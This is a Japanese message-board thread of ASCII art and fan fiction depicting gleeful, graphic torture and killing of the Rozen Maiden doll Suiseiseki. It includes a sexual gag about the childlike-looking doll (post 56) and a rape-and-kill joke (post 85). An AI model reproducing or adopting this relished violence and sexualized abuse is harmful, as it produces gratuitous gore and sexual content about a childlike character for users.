55 :名無しかわいいよ名無し:2006/01/13(金) 17:26:20 ID:IPiVaqrW
>>50
つくれたら貼りますね
でも難しいかも・・・

56 :名無しかわいいよ名無し:2006/01/13(金) 17:37:39 ID:IPiVaqrW
翠星石が「ナデナデシテー」ってうるさいから
頭の上にマッサージ器あてて死ぬほどナデナデしたら
「ファー…ブルスコ…ファー…ブルスコ…ファ-」ってなった。
最初は面白かったんだけど、なんかキモくなったので首元を横から思い切りチョップしたら
「モルスァ」みたいなこと言いながらすごい勢いで飛んで行った。

また戻ってきて翠星石が「ナデナデシテー」ってうるさいからめんどくさいので
マッサージ器を渡したら、翠星石は股間にマッサージ器押し当てて死ぬほど摩り始めて
「ファー…アンアンアンデスゥー…ファー…アンアン…ファ-」ってなった。
最初は面白かったんだけど、なんかまたキモくなったので首元を横から思い切りチョップしたら
「イクデスゥゥゥゥ!!!」みたいなこと言いながらすごい勢いでdで逝った。

57 :名無しかわいいよ名無し:2006/01/13(金) 17:43:48 ID:IPiVaqrW
       (o;).  (o;)
  lゝlヽ  ||   ||  γlノl クワッ
  ゝ´;ノ, く/',二二ヽ> ゝ;ソ
    ゝ ~|  |ノノイハ } ノ
    /\l  |#゚听| l/ヽ すこや蟹!のびや蟹!
    /\l____|(l_介」_ノ/ヽ 
    ヽ ̄≦ノ`ヽノヘ≧~7
      ミく二二二〉ミ

58 :名無しかわいいよ名無し:2006/01/13(金) 17:45:27 ID:IPiVaqrW
         _                           ___
          _ `ヽ                   く/',二二ヽ>
        ,'´r==ミ、ヽ              ≡     |l |ノノイハ))
    ,_ _ _   卯,iリノ)))〉 i \从 /      ,’;;;',   |l |リ;Tヮノl|
  /   `."-|l〉l.#゚дノl /  > .てヽ    ,’;;;',   ノl_(lつ介」つ
 '"'⌒`~"'" ''|と)卯と)  /ヽ   ヘ, ドガ!!! ≡  ≦ノ`ヽノヘ≧
      ∠⊂≡x lヽ彡´   ´Y,´ '          ミく二二二〉ミ
          Ul†|
            レ


59 :名無しかわいいよ名無し:2006/01/13(金) 17:52:44 ID:IPiVaqrW
               ___   
               く/',二二ヽ> 
      |\.      |l |ノノイハ))
      /\>''",《"《"《|l |リ゚ ー゚ノl| 
      ̄ ̄ゝ..,《'_.《_.,(ノ/⌒i)   
      ,.-''' 、)))))(((()))))(((( ''-.,
     ( ,i''゙)))))(((()))))(((()))))゙'' i,)
     .| ゙-..;;_''  ''''',, '',,,._ ,,,..-'゙.|
      l,     ̄ ̄ ̄ ̄     .|
       'l,             ,/
       \          /
         ゙l'-、..,,,,,,,,,,,,..,、-'l゙
         ゙'-、..,,,,,,,,,,,..、-'゙

     「 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\:─────┐  
     |  薔薇乙女 蕎麦屋.   \.────┤  
     |___________/─────

60 :名無しかわいいよ名無し:2006/01/13(金) 17:54:15 ID:IPiVaqrW
                                  .
                                         _
 ┌──┐                                 | |  ___
 i二ニニ二i  _☆──))──))──))))  》>●       | |く/二二,'ヽ>
 i´ノノノヽ)))//                             ヽ./.((ハイ))|l|
  Wリ゚ -゚ノリ//                                || 从゚- ゚;リ|l|
  (|_介_|つ                                  ⊂ l_介_|)|ヘ
   〈__l__〉                                   .≦ノヽノ`ヘ.≧
   〈_ハ_〉                                   ミ<二二二>ミ
翠星石…僕はつよいぞ!                      負けるもんですぅか!

61 :名無しかわいいよ名無し:2006/01/13(金) 17:55:14 ID:IPiVaqrW
              _
                |  |  ___
        ))))》>● |く/二二,'ヽ>
             ヽ./.((ハイ))|l|
         -=≡ || 从`Д´ iリ| アッヒャ━━━━━━━━!!!
        -=≡ ⊂ l_介_|)|ヘ
        -=≡ ≦ノヽノ`ヘ.≧
       -=≡ ミ<二二二>ミ


     \      ☆
             |     ☆
          (⌒ ⌒ヽ   /
    \  (´⌒  ⌒  ⌒ヾ   /
      ('⌒ ; ⌒   ::⌒  )
     (´     )     ::: ) /
  ☆─ (´⌒;:    ::⌒`) :;  )
     (⌒::   ::     ::⌒ )
    / (    ゝ  ヾ 丶  ソ ─



               __    ∞ 〜
             く/二二,'ヽ>
           ,.ζ.l|ノノVイハ))   __
         ⊂'⌒≦つリ>_<ノミつ=<__|


62 :名無しかわいいよ名無し:2006/01/13(金) 17:58:30 ID:9C/qjY45
このスレ癒されるよ、職人さんありがとう。

63 :名無しかわいいよ名無し:2006/01/13(金) 22:36:44 ID:6e9NRPi7
>>58>>59気に入った!
すごいね

64 :名無しかわいいよ名無し:2006/01/14(土) 02:47:32 ID:JTX9E5Lz
        ()二))
           ``ヽ
    _____;==ニlニニニニニ(),,,              ;;'''''"´´´"""''''''::;:,,,
    '=== _.#[ロニ]] ̄ ̄ ̄| ̄ ̄ ̄ ̄ ̄ ̄||二二二二二二二       ,;;;;;´´"''' -
      _/xO;:ニニ() ̄ ̄ ̄ ̄ ̄         ´''''::::::;;;;::::'''''''''´´´
        」(◎)ヽ-ー'
        『発射ぁ!!!』 
          ,,,,,,  :::|
 n    ___:::| ,,,      n
[二]二二ミく二二二〉ミ|__|二二二二二二二[二]



  (( ⌒( ⌒ ) )  )) ) )    ⌒⌒⌒ ( ⌒     
 ( (( ( ⌒ )) ) ) )) ) )  ( ⌒ ⌒  )   
 ( ((                 ⌒⌒⌒⌒⌒⌒       
 ((   (`Д´)「死にたくないですぅ!!」 ←翠星石   ⌒ ⌒ )      
( (⌒                       ⌒ ) )  )
(( (( ⌒ ⌒ ) ) ))⌒ ( (( ( ⌒ )) ) )    
 ( ⌒( (( )) ⌒ ) )  ( (( ( ⌒ )) ) ))
  (( ( (  ) )) ))  ( ⌒( (( )) ⌒ ) ) ) 


「隊長!翠星石を討ち取りました!!」

65 :名無しかわいいよ名無し:2006/01/14(土) 22:32:29 ID:JTX9E5Lz
  丶 _     .,!     ヽ
               >     ``‐.`ヽ、  .|、     |
             ゙'.     ,ト `i、  `i、    .、″
                |    .,.:/""  ゙‐,. `    /
             `  .,-''ヽ"`    ヽ,,,、   !
                、,、‐'゙l‐、      .丿 : ':、
               、/ヽヽ‐ヽ、;,,,,,,,,,-.ッ:''`  .,"-、
              ,r"ツぃ丶  ``````   ../  `i、
          ,.イ:、ヽ/ー`-、-ヽヽヽ、−´    .l゙`-、
         _,,l゙-:ヽ,;、、             、、丶  ゙i、,,、
        ,<_ l_ヽ冫`'`-、;,,,、、、、.............,,,,、.-`":    │ `i、
      、、::|、、、ヽ,、、.    ```: : : ```      、.、'`  .|丶、
     .l","ヽ、,"、,"'、ぃ、、,、、、、.、、、.、、、_、.,,.ヽ´    l゙  ゙).._
    ,、':゙l:、、`:ヽ、`:、  : `"```¬――'''"`゙^`     : ..、丶  .l゙ `ヽ
   ,i´.、ヽ".、".、"'ヽヽ;,:、........、           、、...,,,、−‘`   、‐   |゙゙:‐,
  ,.-l,i´.、".`ヽ,,,.".`   `゙゙'"`'-ー"``"``r-ー`'":      _.‐′  丿  ,!
 j".、'ヽ,".、".、"`''`ー、._、、、           、._,、..-‐:'''′   .、,:"  丿
 ゙l,"`"`''ヽヽ"`"`  ```゙'''"ヽ∠、、、、ぃ-`''''": `      、._./`  ._/`
  `'i`ヽヽヽ`''ーi、、、: :                   、.,-‐'`   、/`
   ``ヽン'`"`  : `~``―ヽ::,,,,,,,,,,.....................,,,,.ー'``^    ,、‐'"
臭いですぅ〜。重いですぅ〜。ヤメロですぅ〜。(`Д´)←翠星石


66 :名無しかわいいよ名無し:2006/01/16(月) 21:50:21 ID:aWaJmq5E
       C⌒ヽ
ズシャ── ⊂二⊃
      _( *‘ω‘*) ちんぽっぽ♪
゚¨ o゚。。 |\( O─O,\  〜 ⌒~
      \.\\ . ヾ .\
       \|三゚三三゚三|
 ⌒~ 〜    \ノヽ \ノヽ
            ̄    ̄  ⌒~  〜
                   く/',二二ヽ>
    ⌒~ 〜           |l |ノノイハ))
                    |l |リ゚ ー゚ノl| 〜♪
               ⌒~  ノl_|(l_介」).| 
  ~⌒               ≦ノ`ヽノヘ≧   ⌒~ 〜 
          ⌒~ 〜    ミく二二二〉ミ

   ⌒~ 〜
                      〜  ⌒~

67 :名無しかわいいよ名無し:2006/01/17(火) 21:11:14 ID:dLbAK1p4
      ___  
     く/',二二ヽ> 
     |l |ノノイハ))       シュッ!
      |l |リ#`Д(;;゚;;))))≡≡≡≡ヽ(・∀・ )ノミカンクエ!!
     ノl_|(l_介」).| 
    ≦ノ`ヽノヘ≧ 
.   ミく二二二〉ミ


68 :名無しかわいいよ名無し:2006/01/17(火) 22:02:03 ID:HhJIyv76
「ダーイビーッチ!」
ッグショ、メリメリメリ
「痛!何するですか!」
「シットォ!」
ゴシャ、グチュルグチュル

69 :名無しかわいいよ名無し:2006/01/18(水) 03:58:01 ID:P4C1wfxX
「ここからはいってくるなよ、チビ人間ですぅ」
「誰に向かっていってるの?」
「チビ人間ですぅ」
「ふぅん」
当然そんな言葉を無視した人間は、翠星石にズカズカと近づいた。
「近づくなですぅ!」
後ろを向き走り出そうとしたが・・・。

「フン!」
ズリッ! バタァァァァァァァァァァン!
人間は翠星石のスカートを踏んでいた。
「その減らず口きけなくしてやるよ!」
ズン!ズン!ズン!ズン!ズン!ズン!ズン!ズン!ズン!
連続して踏みつけられる翠星石。
「へギャッ!フグッ!やめるです、チビ人間!」
「うるせぇ!」
ドゴッ!
蹴りが翠星石の腹にめり込む。
「ヒグッ!」
前のめりになる翠星石。顔は苦痛でゆがみ、涙がそれを彩っていた。
「翠星石が何をしたって言うですか!」
「菓子食っといてうそつくなよ!性悪人形!!」

ズン!
「ヒグッ!や、やめるです、翠星石じゃないです」
「まだいうか!」
ズン!
「ハギュッ!ちがうですぅぅぅぅぅぅぅぅぅぅ!」
「うるせぇ!みえみえ!」
ズン!
「ギャッッ!認めるです!認めるですからチビ人間やめるです!」
「口の利き方がなってないんだよ!」
ドゴッ!
「ッ!」

ふとみると靴の先が翠星石の腹を抜け背中から見えていた。
「気絶したか」
人間は足を抜くと翠星石を床に叩きつけ部屋を後にした。

ゴン!
「ヒグ、ヒック!ヒッグ!どうして翠星石だけっ!」
叩きつけられた衝撃で意識がもどった翠星石は力なく泣き続けた。

70 :名無しかわいいよ名無し:2006/01/18(水) 04:05:26 ID:IXSAdVOJ
愛の無い虐待はいやだ
トムとジェリー的なものきぼん

71 :名無しかわいいよ名無し:2006/01/18(水) 17:19:18 ID:SnViDQFf
でも自分的にはこういうのもありかもしれん

72 :名無しかわいいよ名無し:2006/01/18(水) 17:22:06 ID:o1Ptqp+/
反逆者翠星石を殺せ!

73 :名無しかわいいよ名無し:2006/01/18(水) 19:16:28 ID:SzRZvHq4
鬼畜スレか

74 :名無しかわいいよ名無し:2006/01/18(水) 19:22:50 ID:jNX3AgJQ
スレタイで分かれよ

75 :名無しかわいいよ名無し:2006/01/18(水) 19:27:18 ID:GKSiUnTf
ちょうどこれくらいならまだ可愛いものだな
蒼虐待スクリプトになるともう…

76 :名無しかわいいよ名無し:2006/01/18(水) 19:28:45 ID:jNX3AgJQ
なつかしいなそれ…

77 :名無しかわいいよ名無し:2006/01/19(木) 12:41:02 ID:veFNMXJ/
    。              +
  +     。 o  +    o   。 。
   。       _ _。_    。        。
        〆⌒  ⌒ ^⌒ '' ` 、.
   。   /   , -ー── -‐ 、^,, ヽ.  o  +   。
.  o  /   /         \  丶   / ̄">○
    /  /  ∧ ∧      i  i.  (____|
   。i  /  ( *‘ω‘*) (;;゚;;)   |  .|  |l |ノノイハ))
  。 |  | ./ ̄ ̄ ̄ ̄ ̄ ̄ヽ  |  :|  |∩#゚听ノ∩
   。|  |/※~※~※~※~※~ヽ│ .:.:.|  (      .::)
 ⌒"⌒""⌒⌒⌒"⌒⌒⌒"⌒"⌒⌒"⌒""⌒⌒⌒"⌒⌒

78 :名無しかわいいよ名無し:2006/01/19(木) 13:26:07 ID:zMgpvbbf
コミカルだから良いよねココのはさ、件の虐待SSスレは‥‥

79 :名無しかわいいよ名無し:2006/01/21(土) 13:40:52 ID:jsjXCcC0
期待保守

80 :名無しかわいいよ名無し:2006/01/21(土) 21:10:00 ID:XZhUUYMT
                                   /,ヽ
                                  / / \
                                / /ヽ  \
                               /  /__ \  |
    r@" ̄~@ヽ                    /  く/二二,'ヽ>、 |
    /ノリliliハiliハ              ..::::::::..   ./  /((ハイ))|l| ヽ |
   ノ从リ@ー゚ノ从 ,           ::::<>:::: ミ /  / 从゚д゚.iリ|l|  | |
   ノ从琶,,ξ,,,iつ<==ニ二三>     '':::::::::''  ./  / ⊂l_介_|)|ヘ | |  
  ノリ从く,,,,ξ,,,,>リハ`                /  / ≦ノヽノ`ヘ.≧/ヽ |
      U U                   /  /\ミ<二二二>ミ   |
                            \_/  ヾ      /   /
                               ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

81 :名無しかわいいよ名無し:2006/01/21(土) 21:10:26 ID:WB/K0XHV
蒼星石

         /           , ニvニニヽ
       /     ヽ      〃( (`⌒)⊥ヽ
      /  / l ||  l      ゞ'(て@ ) )ソ ヽ
      / i |  ,. ∧  ヽ    弋 八_ フノ ノノ  !
     ! | | / / |  | !  | i   ⌒‐'^ー''′ .|
      | | | / /r`ー!  | !  |│    ||!    |  |
     | | |// |   il ト、ヾ、 ヽ l   || | | | | |!
      ! .∨〈  !   | ヽヾ、 ヽ l |   川 | | | リ
      ヽ ! ヽ ヽ_ 0ノ  \\ヽ l |   || | | | | /
       ヽト、 i//// ヽ‐ //ヽハ! |  |リ l  / /
        ヽ ヘ u        ヽ!|  //!/_〃'"   父さん…
         \ヽ、    r_つ  u リ //∠_
             >- ┬  -‐ 7'"´  / ヽ
              | ヽ  |ー-─/  / ⌒ヽ!
               ト、!ト、 ト===7  /|       !
               ト、l| \ヽ  // // _ -‐ (
            |   |ヽニ」∠ニ‐''" |   ̄ ノ
            |  |   |  |    !    |
             |  |  /ーヘ    |    |
               |  !.  \/   /    /
          _∠,=彳       /    ∧
        /-!__fニ __        ,     /__〉_
       /  /∠_ヽ、二ー─ ┼─-、 ト、/-ヘ
      /=‐''"    , '" //_,/ ̄`  \′ |
     / /  _, / ./ /_ -‐' ̄ ¬、 /  ヽ\
     /⌒!-‐ ' /  / / |       |'´ \__ ヽく
      !   ヽ/  /   /.〈L_ |  |___レ' r─'´   `ヽ!
      ヽ   `ー/    / `ー' ̄! く ̄       |
      `ー─‐' `ー‐ーく_, -¬-‐ 'ヽ       ノ
                       `ー-----‐'

82 :名無しかわいいよ名無し:2006/01/21(土) 21:27:21 ID:oCi+GYiN
うはwwwwwwwwwgjwwwwwwwwwwwwwwwwwwwwwwwwww

83 :名無しかわいいよ名無し:2006/01/21(土) 22:34:17 ID:Syy1FfDD
キタロウっ?!

84 :名無しかわいいよ名無し:2006/01/22(日) 07:49:53 ID:muXKHObz
生意気な翠星石をヴォコヴォコにするSSが読みたいなぁ


85 :名無しかわいいよ名無し:2006/01/22(日) 12:11:21 ID:fe4JHzBx
10分間レスがなかった場合、翠を犯してから惨殺する。

86 :名無しかわいいよ名無し:2006/01/22(日) 12:54:20 ID:clRv9437
おめでとう

87 :マジレス最高:2006/01/23(月) 03:00:20 ID:wRzPOMS7
翠星石を虐待なんて止めろ

10話を見れば虐待なんかしたくなくなるはず

翠星石が蒼星石を守ると言って
いたのに蒼星石がジャンクにな
ってしまった翠星石の悲しみry

88 :名無しかわいいよ名無し:2006/01/23(月) 05:45:01 ID:Qj1xVHT/
翠星石を殴ってやりたいな

89 :名無しかわいいよ名無し:2006/01/23(月) 22:28:20 ID:PgYe59rA
>>87
こっち見んな

90 :名無しかわいいよ名無し:2006/01/23(月) 23:03:00 ID:8MebT8MT
翠星石かわいいよ翠星石

91 :名無しかわいいよ名無し:2006/01/23(月) 23:54:55 ID:mS5bJaKS
実装石のほうがかわいい

92 :名無しかわいいよ名無し:2006/01/24(火) 01:43:01 ID:s5NTpbKC
アニメの本スレあたりで言うと叩かれるからここで言うが
実装石は絵によっては可愛いと思う

93 :名無しかわいいよ名無し:2006/01/24(火) 09:01:11 ID:TC45fxie
個人の好みを叩く方もどうかしてるがな

94 :名無しかわいいよ名無し:2006/01/24(火) 22:44:55 ID:xmxdU5yF
プッ!
「くさいです!空気を入れ替えるです!」
バカッ!
翠星石が眠っていたカバンが開く。
パタパタパタ。手を振って空気を入れ替えているようだ。
「ふぅ、これで大丈夫です」
そういったとき見ていたこちらに気づいたようだ。

「お前、屁こいたろ」
「気、気のせいですぅ。翠星石は屁なんかしないですよ、めがね」
「音したぞ」
「さ、さっとねるです」
グイ!
「い、痛いです、離しやがれです!」
カバンを閉じようとしていたので手を掴みひっぱりだす。

「嘘はよくないな!」
ドゴッ!
床に叩きつける。
「ギャッ!」
ドス!
腹に足がめり込む。踏みつけられているようだ。
「やめるです。翠星石はなにもしてないで」
「まだ言ううか!」
ドゴ、ヂギッ、ベキャ、コローーーン。
踏みつけられて部品がはずれたようだ。
「ヒギャァァァァァァァァァァァァァァァ!翠星石が悪かったです。もうやめるです。痛いです!」
「あれなにもしてないんじゃ?」
ドゴッ!
「ヒグッ!」

今夜も長くなりそうだ。


おしまい

95 :名無しかわいいよ名無し:2006/01/25(水) 09:08:52 ID:wHlS8l0y
ここアンチスレ?

96 :名無しかわいいよ名無し:2006/01/25(水) 10:32:44 ID:31pm61Oo
スレタイも読めないおばかさんは尿ちゃんにやられてればいいよ

97 :名無しかわいいよ名無し:2006/01/25(水) 15:20:11 ID:GWCVC97r
クソ翠星石が大好きなおまえたちの見ている目の前で
クソ翠星石をキクイムシの幼虫で満たしたドラム缶に
素っ裸後ろ手錠状態で叩き込んでやる。

無数の幼虫にたかられ、生きながら喰われるクソ翠星石のおぞましい姿。
体中数ミリ程度の小さな穴だらけとなり、それでも死ぬ事さえ許されず
「なにしやがるです、はやく助けやがれですぅ」と
間違った主張を繰り返すクソ翠星石の強情で醜い腐り果てた性根。

そのクソ翠星石の哀れな姿を他山の石として、己の誤った価値観を矯正するがよい。


98 :名無しかわいいよ名無し:2006/01/25(水) 18:20:11 ID:wDS4mYFV
                         /,ヽ
                       / / \
                パリンッ  / /ヽ  \
                      /  /__ \  |
       r@" ̄~@ヽ /⌒⌒ヽ  / く/二二,'ヽ>、 |
       /ノリliliハiliハ 卯/ヾヽヽ /  /((ハイ))|l| ヽ|
     ノ从リ@ヮ゚ノ从ミ ゜д゜;i§ ,、/ 从゚д゚.iリ|l|  | |
     ノ从琶,,ξ,,,iつ<==}}]ミつ二ス> (l_介_|)|ヘ | |  
     ノリ从く,,,,ξ,,,,>リハ (_ハ__)    '' ≦ノヽノ`ヘ.≧/ヽ |
        ∪ ∪    UU/  /\ミ<二二二>ミ   |
                   \_/  ヾ      /   /
                     ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

99 :名無しかわいいよ名無し:2006/01/25(水) 19:15:27 ID:wDS4mYFV
   )))<三>   )))<三>    
    +                +
 )))<三> )))<三>  )))<三> 
          +                           ___
))<三>" ̄~@ヽ  )))<三>                  く/二二,'ヽ>
    /ノリliliハiliハ 三>    +                     ((ハイ))|l|      /⌒⌒ヽ
   ノ从リ@-゚ノリ∩  )))<三>                  从`д´;iリ|    (//ヾ卯リ
   ノ从とi,,,ξ,,,i ノ >  +                     ⊂l_介_|)|⊃    ミ ゜д゜;i§
)<三>く,,,,ξ,,,,>リハ )))<三>                  ≦ノヽノ`ヘ.≧    ⊂[{.∞}]ミつ
三>   U U<三>                       ミ<二二二>ミ   ⊂i⌒ (○)

                   ‐ ‐ ― ――= =≡≡≡二<三>≡≡二<三>

         ‐ ‐ ― ――= =≡≡≡二<三> ‐ ‐ ― ― =≡≡≡二<三>
              ‐ ‐ ― ――= =≡≡≡二<三>≡二<三>
    r@" ̄~@ヽ  ‐ ‐ ― ――= =≡≡≡二<三>‐ ‐ ― く/',二二ヽ>=≡≡≡二<三>
    /ノリliliハiliハ       ‐ ‐ ― ――= =≡≡≡二<三> ‐|l |ノノイハ)――= =≡≡≡二<三>
   ノ从リ@-゚ノリミ        ‐ ‐ ― ――= =≡≡≡二<三>|l )))Д´):∵;',‐ = =≡≡≡二<三>
   ノ从とi,,,ξ,,,iつハ   ‐ ‐ ― ――= =≡≡≡二<三>   ノl⊃l_介」ノ⊃∵'        , ⌒⌒ヽ
  ノリ从く,,,,ξ,,,,>リ从       ‐ ‐ ― ――= =≡≡≡二<三ノ`ヽノヘ≡≡≡二<三> ,.ζリノヽ、卯)
       U U                      ‐ ‐ ― ――= =≡≡≡二<三>⊂'⌒m,9、;>_<ノミmλ

100 :名無しかわいいよ名無し:2006/01/25(水) 19:50:13 ID:31pm61Oo
>>97
木で出来てんのか?

101 :名無しかわいいよ名無し:2006/01/25(水) 20:16:59 ID:e56kOb2M
>>100
エンジュと同じ造り方なら陶器だと思う

102 :名無しかわいいよ名無し:2006/01/26(木) 09:23:26 ID:r00nE4TX
>>98-99
GJ
このなんともいえないコミカルさがいいねw

103 :名無しかわいいよ名無し:2006/01/27(金) 10:12:50 ID:Quh4fwor
世の中には楽しいことがたくさんある
翠星石虐待とか翠星石虐待とか翠星石虐待とかw

104 :名無しかわいいよ名無し:2006/01/27(金) 18:17:54 ID:AOrULbzG
実装石たんの画像キボン!!!

105 :名無しかわいいよ名無し:2006/01/27(金) 18:31:34 ID:lxaOhyLS
いらねーよ

106 :名無しかわいいよ名無し:2006/01/28(土) 00:37:02 ID:zhCnO7yn
ふたばのネタなんだからふたばに逝きゃ腐るほどくれるだろ

107 :名無しかわいいよ名無し:2006/01/28(土) 01:56:00 ID:d8r0ElBt
俺は鎌を振りかざし、翠星石の足を切り落として立てなくしてやった。
翠「いやー、やめてですぅ!」
俺は必死にもがく彼女の目の前に立った。
「翠星石には蒼星石やジュンがいるんですよ!だから殺さないで!おねがいですぅ」
目は涙でいっぱいだった。
俺「おー、そうか。残念だがもう会えないな。地獄でよろしく
言っといてくれ」
シュビーン!首を切り落とす。宙に舞った首が着地する間もなくキーック!そして胴体真っ二つ!小便ぶっかける
いい肥やしになるぜ〜
そしてガソリンぶっかけてマッチでシュボッ!
吹っ飛んだ首はハンマーでグシャ!
今日は殺すにはいい日だぜ〜!非ッひゃひゃはyはfyだkfだjだf

108 :名無しかわいいよ名無し:2006/01/28(土) 12:19:30 ID:/lqZIXAH
ヒドwwwwww

109 :名無しかわいいよ名無し:2006/01/28(土) 14:51:01 ID:Oz+GbwQj
「時には広い心を持たないとね。素直にお菓子くれるように言ってみるか」
翠星石がお菓子を作っているらしいのでもらいにいった。
「おい、翠星石、お菓子作ってるならくれよ」
「おまえみたいな人間の分なんてねーです」
その言葉を聞いた直後に俺はハンマーを取り出した。
それに気づいた翠星石は逃げようとする。
「マジうっぜええええええ!」
翠星石を無理やり引っ張って手首足首をカチ割ってやった。
「やっぱ俺の辞書に素直なんて言葉はねえよなあ!」
体が動かせない翠星石はもがき苦しむ
「やめて、どうしてこんなことするですか・・・」
「うっせえんだよくそったれ!あばらを叩き割ってやるぜ!」
ハンマーを大きく振り上げて胴体を叩き割った。
「ぎゃあああ!痛い!痛いですぅ!もうやめてぇ!」
そんな言葉を聞くまもなく、頭を蹴飛ばす。
翠星石の体は痙攣しており、首はどこかに飛んでいってしまった。
「愚かな人形だ。今日死ぬなんて思ってなかったろ?おったまげ〜!げひゃひゃひゃひゃひゃうひひっひっひひっぃ」
と、さっき吹っ飛んだ顔が転がってきた。悲しそうな顔をしている。
「てめえ!そんな顔されると!」
俺は思いっきり蹴りまくった。
「余計にぶち壊したくなるじゃねえかよ!」

110 :名無しかわいいよ名無し:2006/01/28(土) 14:55:36 ID:GmxlbYVg
このスレ和むな、AAも好きだったけど文も結構好き

111 :名無しかわいいよ名無し:2006/01/28(土) 22:50:56 ID:FQ+3R903
      )::::::::::::::::::::,  ´    )::::::::::::::===彡::::::テ
       (::::::::::::::::://    ヽ:::_:::::::::::::::::i  l::::l:::::ハ二))
      >:::::::,.'  ′    |   ):::::::::::::::l  i:::i:::::(、二))
        て::::/   ll  l |  !|   {::::::::::::::::|  l::i:::::::::ハ〈
         しl |  l |  | | _!\L'フ|/て::::::::::彡ミ::::::::(  !l
         l l  l  ノ"L`| |  rT´_ | (::::::::ミ彡::::::ィ  l|l
            ll。ヽ ´ rr、    ヽ_'っ | l! ol゚ ol::::;:::) |  リ
       。    ハ v)        l lo| リ /:://   |  | お客様の中にお父様は
         ゚   ,' ハ。  {ァ´ヽ   リ ,| |//゚ 。 | |  いらっしゃいませんか??
      。 o  。   |  〉 、  ー'  lレ' | h、     |  |
            l / ||  > - ィ 〃 | | l7      |  |
            ノ'  |r j / rr、 〃  | | 〈 \    |  |
            /'   ノl j/ _ト(  ノ l (   \  |  |

112 :名無しかわいいよ名無し:2006/01/29(日) 01:36:25 ID:MN4BmoM/
はい今すぐ逝きます!

113 :名無しかわいいよ名無し:2006/01/29(日) 06:20:08 ID:/PGkXYjO
実装石たんの画像はどこにあるの?

114 :名無しかわいいよ名無し:2006/01/29(日) 12:33:46 ID:sVowPKr6
〜翠星石虐殺小説〜

いつものように世間は平凡に時が流れている。だが、ある家では空気が悪かった。
『おい、翠星石!僕はお前みたいな性悪な奴が一番ムカつくんだよ!!大人ぶってるつもりか知らんが中身は所詮ガキのくせに!!』
ある日僕は突然、相変わらず小生意気な翠星石に殺意がわいた。
「はぁ!?いきなり何を言い出すですかチビ人間!!私こそお前みたいな凡人なんぞムカつくのですぅ!」やはり大体予想していた小生意気な返事が返ってきた
『お前という非常識な生き物はこの家に置いてもらっといて感謝と言うのがないのか!?』「それは仕方ない事ですぅ!お前は私のミーディアムなんですから!!私だってお前なんぞの家にいたくないですぅ!今すぐ契約を解きたいぐらいですぅ!!」
僕は“だったら契約を解けばいいだろ!”とは言わず、ただただ言い争いを続けていた。僕はそろそろ疲れてきたので、言い争いだけで終わらせるつもりだった。この時は…本当に、“この時まで”は…だが、翠星石のこの一言を聞いて僕の理性はブチ切れた。
「テメェなんかをミーディアムにして、死ぬほど後悔してるですぅ!!テメェみたいな社会のゴミは、さっさと地獄の底に失せやがれですぅ!!」

115 :名無しかわいいよ名無し:2006/01/29(日) 12:43:26 ID:sVowPKr6
翠星石は叫ぶだけ好き勝手に叫んで鞄の中に閉じこもろうとした。
だが、僕は、いつもはそれを見守るだけなのに、翠星石が鞄の扉を勢い良く開けた所を翠星石の長い髪を捕まえ、床に叩きつけた。
「痛っ…何しやがるですかぁ!離せですぅ!!」
当然翠星石は怒り、怒鳴った。床に押さえられたままの翠星石はバタバタと暴れた。
それが余計に僕の加虐心を震わせた。
『本当はいつものように言い争うだけで終わらせるつもりだったんだ。だが、お前が言った一言のせいで気が変わった。後悔しながら苦しむんだな』
僕は翠星石の髪を掴んだまま、引きずり回した。
「痛あぁぁあぁっ!!やめてですぅぅ〜〜!!」翠星石は髪を引っ張られて起きた激痛に耐えきれず、泣き叫ぶ。
『ぶはははは!!いつもは僕の事を無様だとか言う今のお前はもっと無様だな!!てか人形って痛みとかないんじゃないのかよ!?』「に…んぎょうに‥だってぇ…生きてたら痛みぐらい‥あるですぅっ‥」

116 :名無しかわいいよ名無し:2006/01/29(日) 12:47:05 ID:sVowPKr6
僕は翠星石の髪を掴んだままブラブラと振り回した。翠星石の髪はボサボサになり、顔は涙でグチャグチャだった。
僕はそれを見て、狂ったように大笑いした。
「スィ…スィドリーム!!」翠星石は何とか力を振り絞り、人工精霊の名を叫んだ。
すると緑に輝く人工精霊が飛び出してきた。そして僕に襲い掛かってきた。
だが、理性が切れた僕は、簡単にスィドリームを叩き落とした。スィドリームはあわてて部屋の外に逃げ出した。
「スィ‥ドリームの役立たずですうぅぅ!!」
翠星石は、なお叫び続けている。
『おい、翠星石!お前今人工精霊を使って僕を攻撃しようとしたな…!?』翠星石を再び床に叩きつけ、僕は鬼のような顔で翠星石を睨み見下した。

117 :名無しかわいいよ名無し:2006/01/29(日) 12:51:01 ID:sVowPKr6
「ひぃっ…な‥何です!?」翠星石は怯えて全身が震えている。
『そうだ。お前のその“ですです”言う口癖もうざったかったんだよな!!ケケッ』
僕は近くにあった金属バッドで動けなくなっている翠星石を殴り付けた。
「ぎゃあッ!!痛すぎるで…すぅ!真紅ぅ!…雛苺…蒼星石ぃ〜…!!」
『ぐははは!!他の人形に助けを求めようったって無駄無駄!!あいつらには聞こえねーよ!!』
僕は無茶苦茶に殴りまくった。翠星石の顔が変形してきた。
「ぃ…やぁっ‥私はただ‥自分の意見を言っただけなのにぃ‥っ!!ぅぐっ!」『もっと泣き叫べよ。泣き叫んで暴れて僕を楽しませろよ性悪人形!!』
「お前は‥狂ってる‥ですぅ!」
『何とでも言え!今の僕には無効だ!それ以前にそれ以上の言葉をお前に言われてるからな!ケケケッ』
僕は完全に正気を失い、狂っていた。さんざん殴った後、今度は服をビリビリに引き裂き、全裸にした。「何するですか!!やめやがれですぅ!この変態!!」翠星石は驚いて再び暴れだした。
『おっ!まだ反抗する元気が残ってたか。別にお前なんかに欲情しねーよ!何するかって?こうするんだよ!』僕は全裸になった翠星石の全身を縄で頑丈に縛り、泣き叫ぶ翠星石を無視して髪を切り始めた。
「やめやがれですぅ!お父様に造っていただいたこの身体…お前が好き勝手にするな‥ですぅ!!」

118 :名無しかわいいよ名無し:2006/01/29(日) 12:55:15 ID:sVowPKr6
『うっせぇーなぁ!この長くて汚ねぇ髪!邪魔なんだよ!!かっこつけて先を巻きやがって!!口癖の次にムカつくお前の容姿だな!』
僕は乱暴にジャキジャキと鋏を鳴らしながら容赦なく翠星石の髪を切っていく。「嫌ぁ!やめやがれですぅ!殺す気かこのチクショーめですぅ!!」
なお乱暴になっていく翠星石の口。
『はぁ!?お前はさっき、殴られた事でもぅ死んだようなもんだろ!?まだ殴られたりねーのかよ!だったら望み通りにしてやるよ!!ケケケッ』
